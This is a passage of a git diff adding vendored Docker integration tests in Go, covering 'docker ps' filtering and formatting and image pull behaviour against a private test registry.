checker.Equals, true, check.Commentf("Expected filtered container(s) for %s ancestor filter to be %v, got %v", filterName, expectedIDs, actualIDs)) + } +} + +func (s *DockerSuite) TestPsListContainersFilterLabel(c *check.C) { + // start container + dockerCmd(c, "run", "--name=first", "-l", "match=me", "-l", "second=tag", "busybox") + firstID, err := getIDByName("first") + c.Assert(err, check.IsNil) + + // start another container + dockerCmd(c, "run", "--name=second", "-l", "match=me too", "busybox") + secondID, err := getIDByName("second") + c.Assert(err, check.IsNil) + + // start third container + dockerCmd(c, "run", "--name=third", "-l", "nomatch=me", "busybox") + thirdID, err := getIDByName("third") + c.Assert(err, check.IsNil) + + // filter containers by exact match + out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, firstID, check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID, containerOut, out)) + + // filter containers by two labels + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me", "--filter=label=second=tag") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, firstID, check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID, containerOut, out)) + + // filter containers by two labels, but expect not found because of AND behavior + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me", "--filter=label=second=tag-no") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, "", check.Commentf("Expected nothing, got %s for exited filter, output: %q", containerOut, out)) + + // filter containers by exact key + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Contains, firstID) + c.Assert(containerOut, checker.Contains, secondID) + c.Assert(containerOut, checker.Not(checker.Contains), thirdID) +} + +func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) { + runSleepingContainer(c, "--name=sleep") + + dockerCmd(c, "run", "--name", "zero1", "busybox", "true") + firstZero, err := getIDByName("zero1") + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "--name", "zero2", "busybox", "true") + secondZero, err := getIDByName("zero2") + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("run", "--name", "nonzero1", "busybox", "false") + c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) + + firstNonZero, err := getIDByName("nonzero1") + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("run", "--name", "nonzero2", "busybox", "false") + c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) + secondNonZero, err := getIDByName("nonzero2") + c.Assert(err, checker.IsNil) + + // filter containers by exited=0 + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=0") + ids := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(ids, checker.HasLen, 2, check.Commentf("Should be 2 zero exited containers got %d: %s", len(ids), out)) + c.Assert(ids[0], checker.Equals, secondZero, check.Commentf("First in list should be %q, got %q", secondZero, ids[0])) + c.Assert(ids[1], checker.Equals, firstZero, check.Commentf("Second in list should be %q, got %q", firstZero, ids[1])) + + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=1") + ids = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(ids, checker.HasLen, 2, check.Commentf("Should be 2 zero exited containers got %d", len(ids))) + c.Assert(ids[0], checker.Equals, secondNonZero, check.Commentf("First in list should be %q, got %q", secondNonZero, ids[0])) + c.Assert(ids[1], checker.Equals, firstNonZero, check.Commentf("Second in list should be %q, got %q", firstNonZero, ids[1])) + +} + +func (s *DockerSuite) TestPsRightTagName(c *check.C) { + // TODO Investigate further why this fails on Windows to Windows CI + testRequires(c, DaemonIsLinux) + tag := "asybox:shmatest" + dockerCmd(c, "tag", "busybox", tag) + + var id1 string + out, _ := runSleepingContainer(c) + id1 = strings.TrimSpace(string(out)) + + var id2 string + out, _ = runSleepingContainerInImage(c, tag) + id2 = strings.TrimSpace(string(out)) + + var imageID string + out = inspectField(c, "busybox", "Id") + imageID = strings.TrimSpace(string(out)) + + var id3 string + out, _ = runSleepingContainerInImage(c, imageID) + id3 = strings.TrimSpace(string(out)) + + out, _ = dockerCmd(c, "ps", "--no-trunc") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + // skip header + lines = lines[1:] + c.Assert(lines, checker.HasLen, 3, check.Commentf("There should be 3 running container, got %d", len(lines))) + for _, line := range lines { + f := strings.Fields(line) + switch f[0] { + case id1: + c.Assert(f[1], checker.Equals, "busybox", check.Commentf("Expected %s tag for id %s, got %s", "busybox", id1, f[1])) + case id2: + c.Assert(f[1], checker.Equals, tag, check.Commentf("Expected %s tag for id %s, got %s", tag, id2, f[1])) + case id3: + c.Assert(f[1], checker.Equals, imageID, check.Commentf("Expected %s imageID for id %s, got %s", tag, id3, f[1])) + default: + c.Fatalf("Unexpected id %s, expected %s and %s and %s", f[0], id1, id2, id3) + } + } +} + +func (s *DockerSuite) TestPsLinkedWithNoTrunc(c *check.C) { + // Problematic on Windows as it doesn't support links as of Jan 2016 + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "--name=first") + runSleepingContainer(c, "--name=second", "--link=first:first") + + out, _ := dockerCmd(c, "ps", "--no-trunc") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + // strip header + lines = lines[1:] + expected := []string{"second", "first,second/first"} + var names []string + for _, l := range lines { + fields := strings.Fields(l) + names = append(names, fields[len(fields)-1]) + } + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestPsGroupPortRange(c *check.C) { + // Problematic on Windows as it doesn't support port ranges as of Jan 2016 + testRequires(c, DaemonIsLinux) + portRange := "3850-3900" + dockerCmd(c, "run", "-d", "--name", "porttest", "-p", portRange+":"+portRange, "busybox", "top") + + out, _ := dockerCmd(c, "ps") + + c.Assert(string(out), checker.Contains, portRange, check.Commentf("docker ps output should have had the port range %q: %s", portRange, string(out))) + +} + +func (s *DockerSuite) TestPsWithSize(c *check.C) { + // Problematic on Windows as it doesn't report the size correctly @swernli + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "sizetest", "busybox", "top") + + out, _ := dockerCmd(c, "ps", "--size") + c.Assert(out, checker.Contains, "virtual", check.Commentf("docker ps with --size should show virtual size of container")) +} + +func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) { + // create a container + out, _ := dockerCmd(c, "create", "busybox") + cID := strings.TrimSpace(out) + shortCID := cID[:12] + + // Make sure it DOESN'T show up w/o a '-a' for normal 'ps' + out, _ = dockerCmd(c, "ps", "-q") + c.Assert(out, checker.Not(checker.Contains), shortCID, check.Commentf("Should have not seen '%s' in ps output:\n%s", shortCID, out)) + + // Make sure it DOES show up as 'Created' for 'ps -a' + out, _ = dockerCmd(c, "ps", "-a") + + hits := 0 + for _, line := range strings.Split(out, "\n") { + if !strings.Contains(line, shortCID) { + continue + } + hits++ + c.Assert(line, checker.Contains, "Created", check.Commentf("Missing 'Created' on '%s'", line)) + } + + c.Assert(hits, checker.Equals, 1, check.Commentf("Should have seen '%s' in ps -a output once:%d\n%s", shortCID, hits, out)) + + // filter containers by 'create' - note, no -a needed + out, _ = dockerCmd(c, "ps", "-q", "-f", "status=created") + containerOut := strings.TrimSpace(out) + c.Assert(cID, checker.HasPrefix, containerOut) +} + +func (s *DockerSuite) TestPsFormatMultiNames(c *check.C) { + // Problematic on Windows as it doesn't support link as of Jan 2016 + testRequires(c, DaemonIsLinux) + //create 2 containers and link them + dockerCmd(c, "run", "--name=child", "-d", "busybox", "top") + dockerCmd(c, "run", "--name=parent", "--link=child:linkedone", "-d", "busybox", "top") + + //use the new format capabilities to only list the names and --no-trunc to get all names + out, _ := dockerCmd(c, "ps", "--format", "{{.Names}}", "--no-trunc") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + expected := []string{"parent", "child,parent/linkedone"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names)) + + //now list without turning off truncation and make sure we only get the non-link names + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}}") + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + expected = []string{"parent", "child"} + var truncNames []string + truncNames = append(truncNames, lines...) + c.Assert(expected, checker.DeepEquals, truncNames, check.Commentf("Expected array with truncated names: %v, got: %v", expected, truncNames)) +} + +// Test for GitHub issue #21772 +func (s *DockerSuite) TestPsNamesMultipleTime(c *check.C) { + runSleepingContainer(c, "--name=test1") + runSleepingContainer(c, "--name=test2") + + //use the new format capabilities to list the names twice + out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Names}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + expected := []string{"test2 test2", "test1 test1"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with names displayed twice: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestPsFormatHeaders(c *check.C) { + // make sure no-container "docker ps" still prints the header row + out, _ := dockerCmd(c, "ps", "--format", "table {{.ID}}") + c.Assert(out, checker.Equals, "CONTAINER ID\n", check.Commentf(`Expected 'CONTAINER ID\n', got %v`, out)) + + // verify that "docker ps" with a container still prints the header row also + runSleepingContainer(c, "--name=test") + out, _ = dockerCmd(c, "ps", "--format", "table {{.Names}}") + c.Assert(out, checker.Equals, "NAMES\ntest\n", check.Commentf(`Expected 'NAMES\ntest\n', got %v`, out)) +} + +func (s *DockerSuite) TestPsDefaultFormatAndQuiet(c *check.C) { + config := `{ + "psFormat": "default {{ .ID }}" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ := runSleepingContainer(c, "--name=test") + id := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "--config", d, "ps", "-q") + c.Assert(id, checker.HasPrefix, strings.TrimSpace(out), check.Commentf("Expected to print only the container id, got %v\n", out)) +} + +// Test for GitHub issue #12595 +func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { + // TODO: Investigate why this fails on Windows to Windows CI further. + testRequires(c, DaemonIsLinux) + originalImageName := "busybox:TestPsImageIDAfterUpdate-original" + updatedImageName := "busybox:TestPsImageIDAfterUpdate-updated" + + runCmd := exec.Command(dockerBinary, "tag", "busybox:latest", originalImageName) + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + + originalImageID, err := getIDByName(originalImageName) + c.Assert(err, checker.IsNil) + + runCmd = exec.Command(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...) + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + containerID := strings.TrimSpace(out) + + linesOut, err := exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() + c.Assert(err, checker.IsNil) + + lines := strings.Split(strings.TrimSpace(string(linesOut)), "\n") + // skip header + lines = lines[1:] + c.Assert(len(lines), checker.Equals, 1) + + for _, line := range lines { + f := strings.Fields(line) + c.Assert(f[1], checker.Equals, originalImageName) + } + + runCmd = exec.Command(dockerBinary, "commit", containerID, updatedImageName) + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + + runCmd = exec.Command(dockerBinary, "tag", updatedImageName, originalImageName) + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + + linesOut, err = exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() + c.Assert(err, checker.IsNil) + + lines = strings.Split(strings.TrimSpace(string(linesOut)), "\n") + // skip header + lines = lines[1:] + c.Assert(len(lines), checker.Equals, 1) + + for _, line := range lines { + f := strings.Fields(line) + c.Assert(f[1], checker.Equals, originalImageID) + } + +} + +func (s *DockerSuite) TestPsNotShowPortsOfStoppedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name=foo", "-d", "-p", "5000:5000", "busybox", "top") + c.Assert(waitRun("foo"), checker.IsNil) + out, _ := dockerCmd(c, "ps") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + expected := "0.0.0.0:5000->5000/tcp" + fields := strings.Fields(lines[1]) + c.Assert(fields[len(fields)-2], checker.Equals, expected, check.Commentf("Expected: %v, got: %v", expected, fields[len(fields)-2])) + + dockerCmd(c, "kill", "foo") + dockerCmd(c, "wait", "foo") + out, _ = dockerCmd(c, "ps", "-l") + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + fields = strings.Fields(lines[1]) + c.Assert(fields[len(fields)-2], checker.Not(checker.Equals), expected, check.Commentf("Should not got %v", expected)) +} + +func (s *DockerSuite) TestPsShowMounts(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + mp := prefix + slash + "test" + + dockerCmd(c, "volume", "create", "ps-volume-test") + // volume mount containers + runSleepingContainer(c, "--name=volume-test-1", "--volume", "ps-volume-test:"+mp) + c.Assert(waitRun("volume-test-1"), checker.IsNil) + runSleepingContainer(c, "--name=volume-test-2", "--volume", mp) + c.Assert(waitRun("volume-test-2"), checker.IsNil) + // bind mount container + var bindMountSource string + var bindMountDestination string + if DaemonIsWindows.Condition() { + bindMountSource = "c:\\" + bindMountDestination = "c:\\t" + } else { + bindMountSource = "/tmp" + bindMountDestination = "/t" + } + runSleepingContainer(c, "--name=bind-mount-test", "-v", bindMountSource+":"+bindMountDestination) + c.Assert(waitRun("bind-mount-test"), checker.IsNil) + + out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}") + + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 3) + + fields := strings.Fields(lines[0]) + c.Assert(fields, checker.HasLen, 2) + c.Assert(fields[0], checker.Equals, "bind-mount-test") + c.Assert(fields[1], checker.Equals, bindMountSource) + + fields = strings.Fields(lines[1]) + c.Assert(fields, checker.HasLen, 2) + + annonymounsVolumeID := fields[1] + + fields = strings.Fields(lines[2]) + c.Assert(fields[1], checker.Equals, "ps-volume-test") + + // filter by volume name + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=ps-volume-test") + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 1) + + fields = strings.Fields(lines[0]) + c.Assert(fields[1], checker.Equals, "ps-volume-test") + + // empty results filtering by unknown volume + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=this-volume-should-not-exist") + c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0) + + // filter by mount destination + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+mp) + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 2) + + fields = strings.Fields(lines[0]) + c.Assert(fields[1], checker.Equals, annonymounsVolumeID) + fields = strings.Fields(lines[1]) + c.Assert(fields[1], checker.Equals, "ps-volume-test") + + // filter by bind mount source + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountSource) + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 1) + + fields = strings.Fields(lines[0]) + c.Assert(fields, checker.HasLen, 2) + c.Assert(fields[0], checker.Equals, "bind-mount-test") + c.Assert(fields[1], checker.Equals, bindMountSource) + + // filter by bind mount destination + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountDestination) + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 1) + + fields = strings.Fields(lines[0]) + c.Assert(fields, checker.HasLen, 2) + c.Assert(fields[0], checker.Equals, "bind-mount-test") + c.Assert(fields[1], checker.Equals, bindMountSource) + + // empty results filtering by unknown mount point + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+prefix+slash+"this-path-was-never-mounted") + c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0) +} + +func (s *DockerSuite) TestPsFormatSize(c *check.C) { + testRequires(c, DaemonIsLinux) + runSleepingContainer(c) + + out, _ := dockerCmd(c, "ps", "--format", "table {{.Size}}") + lines := strings.Split(out, "\n") + c.Assert(lines[1], checker.Not(checker.Equals), "0 B", check.Commentf("Should not display a size of 0 B")) + + out, _ = dockerCmd(c, "ps", "--size", "--format", "table {{.Size}}") + lines = strings.Split(out, "\n") + c.Assert(lines[0], checker.Equals, "SIZE", check.Commentf("Should only have one size column")) + + out, _ = dockerCmd(c, "ps", "--size", "--format", "raw") + lines = strings.Split(out, "\n") + c.Assert(lines[8], checker.HasPrefix, "size:", check.Commentf("Size should be appended on a newline")) +} + +func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { + // TODO default network on Windows is not called "bridge", and creating a + // custom network fails on Windows fails with "Error response from daemon: plugin not found") + testRequires(c, DaemonIsLinux) + + // create some containers + runSleepingContainer(c, "--net=bridge", "--name=onbridgenetwork") + runSleepingContainer(c, "--net=none", "--name=onnonenetwork") + + // Filter docker ps on non existing network + out, _ := dockerCmd(c, "ps", "--filter", "network=doesnotexist") + containerOut := strings.TrimSpace(string(out)) + lines := strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + // ps output should have no containers + c.Assert(lines, checker.HasLen, 0) + + // Filter docker ps on network bridge + out, _ = dockerCmd(c, "ps", "--filter", "network=bridge") + containerOut = strings.TrimSpace(string(out)) + + lines = strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + // ps output should have only one container + c.Assert(lines, checker.HasLen, 1) + + // Making sure onbridgenetwork is on the output + c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n")) + + // Filter docker ps on networks bridge and none + out, _ = dockerCmd(c, "ps", "--filter", "network=bridge", "--filter", "network=none") + containerOut = strings.TrimSpace(string(out)) + + lines = strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + //ps output should have both the containers + c.Assert(lines, checker.HasLen, 2) + + // Making sure onbridgenetwork and onnonenetwork is on the output + c.Assert(containerOut, checker.Contains, "onnonenetwork", check.Commentf("Missing the container on none network\n")) + c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on bridge network\n")) + + nwID, _ := dockerCmd(c, "network", "inspect", "--format", "{{.ID}}", "bridge") + + // Filter by network ID + out, _ = dockerCmd(c, "ps", "--filter", "network="+nwID) + containerOut = strings.TrimSpace(string(out)) + + c.Assert(containerOut, checker.Contains, "onbridgenetwork") +} + +func (s *DockerSuite) TestPsByOrder(c *check.C) { + name1 := "xyz-abc" + out, err := runSleepingContainer(c, "--name", name1) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + container1 := strings.TrimSpace(out) + + name2 := "xyz-123" + out, err = runSleepingContainer(c, "--name", name2) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + container2 := strings.TrimSpace(out) + + name3 := "789-abc" + out, err = runSleepingContainer(c, "--name", name3) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + name4 := "789-123" + out, err = runSleepingContainer(c, "--name", name4) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // Run multiple time should have the same result + out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) + + // Run multiple time should have the same result + out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) +} + +func (s *DockerSuite) TestPsFilterMissingArgErrorCode(c *check.C) { + _, errCode, _ := dockerCmdWithError("ps", "--filter") + c.Assert(errCode, checker.Equals, 125) +} + +// Test case for 30291 +func (s *DockerSuite) TestPsFormatTemplateWithArg(c *check.C) { + runSleepingContainer(c, "-d", "--name", "top", "--label", "some.label=label.foo-bar") + out, _ := dockerCmd(c, "ps", "--format", `{{.Names}} {{.Label "some.label"}}`) + c.Assert(strings.TrimSpace(out), checker.Equals, "top label.foo-bar") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go new file mode 100644 index 0000000000..cb14c2c702 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go @@ -0,0 +1,492 @@ +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest" + "github.com/docker/distribution/manifest/manifestlist" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// testPullImageWithAliases pulls a specific image tag and verifies that any aliases (i.e., other +// tags for the same image) are not also pulled down. +// +// Ref: docker/docker#8141 +func testPullImageWithAliases(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"recent", "fresh"} { + repos = append(repos, fmt.Sprintf("%v:%v", repoName, tag)) + } + + // Tag and push the same image multiple times. + for _, repo := range repos { + dockerCmd(c, "tag", "busybox", repo) + dockerCmd(c, "push", repo) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) + + // Pull a single tag and verify it doesn't bring down all aliases. + dockerCmd(c, "pull", repos[0]) + dockerCmd(c, "inspect", repos[0]) + for _, repo := range repos[1:] { + _, _, err := dockerCmdWithError("inspect", repo) + c.Assert(err, checker.NotNil, check.Commentf("Image %v shouldn't have been pulled down", repo)) + } +} + +func (s *DockerRegistrySuite) TestPullImageWithAliases(c *check.C) { + testPullImageWithAliases(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullImageWithAliases(c *check.C) { + testPullImageWithAliases(c) +} + +// testConcurrentPullWholeRepo pulls the same repo concurrently. +func testConcurrentPullWholeRepo(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"recent", "fresh", "todays"} { + repo := fmt.Sprintf("%v:%v", repoName, tag) + _, err := buildImage(repo, fmt.Sprintf(` + FROM busybox + ENTRYPOINT ["/bin/echo"] + ENV FOO foo + ENV BAR bar + CMD echo %s + `, repo), true) + c.Assert(err, checker.IsNil) + dockerCmd(c, "push", repo) + repos = append(repos, repo) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) + + // Run multiple re-pulls concurrently + results := make(chan error) + numPulls := 3 + + for i := 0; i != numPulls; i++ { + go func() { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", "-a", repoName)) + results <- err + }() + } + + // These checks are separate from the loop above because the check + // package is not goroutine-safe. + for i := 0; i != numPulls; i++ { + err := <-results + c.Assert(err, checker.IsNil, check.Commentf("concurrent pull failed with error: %v", err)) + } + + // Ensure all tags were pulled successfully + for _, repo := range repos { + dockerCmd(c, "inspect", repo) + out, _ := dockerCmd(c, "run", "--rm", repo) + c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo) + } +} + +func (s *DockerRegistrySuite) testConcurrentPullWholeRepo(c *check.C) { + testConcurrentPullWholeRepo(c) +} + +func (s *DockerSchema1RegistrySuite) testConcurrentPullWholeRepo(c *check.C) { + testConcurrentPullWholeRepo(c) +} + +// testConcurrentFailingPull tries a concurrent pull that doesn't succeed. +func testConcurrentFailingPull(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + // Run multiple pulls concurrently + results := make(chan error) + numPulls := 3 + + for i := 0; i != numPulls; i++ { + go func() { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repoName+":asdfasdf")) + results <- err + }() + } + + // These checks are separate from the loop above because the check + // package is not goroutine-safe. + for i := 0; i != numPulls; i++ { + err := <-results + c.Assert(err, checker.NotNil, check.Commentf("expected pull to fail")) + } +} + +func (s *DockerRegistrySuite) testConcurrentFailingPull(c *check.C) { + testConcurrentFailingPull(c) +} + +func (s *DockerSchema1RegistrySuite) testConcurrentFailingPull(c *check.C) { + testConcurrentFailingPull(c) +} + +// testConcurrentPullMultipleTags pulls multiple tags from the same repo +// concurrently. +func testConcurrentPullMultipleTags(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"recent", "fresh", "todays"} { + repo := fmt.Sprintf("%v:%v", repoName, tag) + _, err := buildImage(repo, fmt.Sprintf(` + FROM busybox + ENTRYPOINT ["/bin/echo"] + ENV FOO foo + ENV BAR bar + CMD echo %s + `, repo), true) + c.Assert(err, checker.IsNil) + dockerCmd(c, "push", repo) + repos = append(repos, repo) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) + + // Re-pull individual tags, in parallel + results := make(chan error) + + for _, repo := range repos { + go func(repo string) { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repo)) + results <- err + }(repo) + } + + // These checks are separate from the loop above because the check + // package is not goroutine-safe. + for range repos { + err := <-results + c.Assert(err, checker.IsNil, check.Commentf("concurrent pull failed with error: %v", err)) + } + + // Ensure all tags were pulled successfully + for _, repo := range repos { + dockerCmd(c, "inspect", repo) + out, _ := dockerCmd(c, "run", "--rm", repo) + c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo) + } +} + +func (s *DockerRegistrySuite) TestConcurrentPullMultipleTags(c *check.C) { + testConcurrentPullMultipleTags(c) +} + +func (s *DockerSchema1RegistrySuite) TestConcurrentPullMultipleTags(c *check.C) { + testConcurrentPullMultipleTags(c) +} + +// testPullIDStability verifies that pushing an image and pulling it back +// preserves the image ID. +func testPullIDStability(c *check.C) { + derivedImage := privateRegistryURL + "/dockercli/id-stability" + baseImage := "busybox" + + _, err := buildImage(derivedImage, fmt.Sprintf(` + FROM %s + ENV derived true + ENV asdf true + RUN dd if=/dev/zero of=/file bs=1024 count=1024 + CMD echo %s + `, baseImage, derivedImage), true) + if err != nil { + c.Fatal(err) + } + + originalID, err := getIDByName(derivedImage) + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + dockerCmd(c, "push", derivedImage) + + // Pull + out, _ := dockerCmd(c, "pull", derivedImage) + if strings.Contains(out, "Pull complete") { + c.Fatalf("repull redownloaded a layer: %s", out) + } + + derivedIDAfterPull, err := getIDByName(derivedImage) + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + + if derivedIDAfterPull != originalID { + c.Fatal("image's ID unexpectedly changed after a repush/repull") + } + + // Make sure the image runs correctly + out, _ = dockerCmd(c, "run", "--rm", derivedImage) + if strings.TrimSpace(out) != derivedImage { + c.Fatalf("expected %s; got %s", derivedImage, out) + } + + // Confirm that repushing and repulling does not change the computed ID + dockerCmd(c, "push", derivedImage) + dockerCmd(c, "rmi", derivedImage) + dockerCmd(c, "pull", derivedImage) + + derivedIDAfterPull, err = getIDByName(derivedImage) + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + + if derivedIDAfterPull != originalID { + c.Fatal("image's ID unexpectedly changed after a repush/repull") + } + if err != nil { + c.Fatalf("error inspecting: %v", err) + } + + // Make sure the image still runs + out, _ = dockerCmd(c, "run", "--rm", derivedImage) + if strings.TrimSpace(out) != derivedImage { + c.Fatalf("expected %s; got %s", derivedImage, out) + } +} + +func (s *DockerRegistrySuite) TestPullIDStability(c *check.C) { + testPullIDStability(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullIDStability(c *check.C) { + testPullIDStability(c) +} + +// #21213 +func testPullNoLayers(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/scratch", privateRegistryURL) + + _, err := buildImage(repoName, ` + FROM scratch + ENV foo bar`, + true) + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + dockerCmd(c, "pull", repoName) +} + +func (s *DockerRegistrySuite) TestPullNoLayers(c *check.C) { + testPullNoLayers(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullNoLayers(c *check.C) { + testPullNoLayers(c) +} + +func (s *DockerRegistrySuite) TestPullManifestList(c *check.C) { + testRequires(c, NotArm) + pushDigest, err := setupImage(c) + c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) + + // Inject a manifest list into the registry + manifestList := &manifestlist.ManifestList{ + Versioned: manifest.Versioned{ + SchemaVersion: 2, + MediaType: manifestlist.MediaTypeManifestList, + }, + Manifests: []manifestlist.ManifestDescriptor{ + { + Descriptor: distribution.Descriptor{ + Digest: "sha256:1a9ec845ee94c202b2d5da74a24f0ed2058318bfa9879fa541efaecba272e86b", + Size: 3253, + MediaType: schema2.MediaTypeManifest, + }, + Platform: manifestlist.PlatformSpec{ + Architecture: "bogus_arch", + OS: "bogus_os", + }, + }, + { + Descriptor: distribution.Descriptor{ + Digest: pushDigest, + Size: 3253, + MediaType: schema2.MediaTypeManifest, + }, + Platform: manifestlist.PlatformSpec{ + Architecture: runtime.GOARCH, + OS: runtime.GOOS, + }, + }, + }, + } + + manifestListJSON, err := json.MarshalIndent(manifestList, "", " ") + 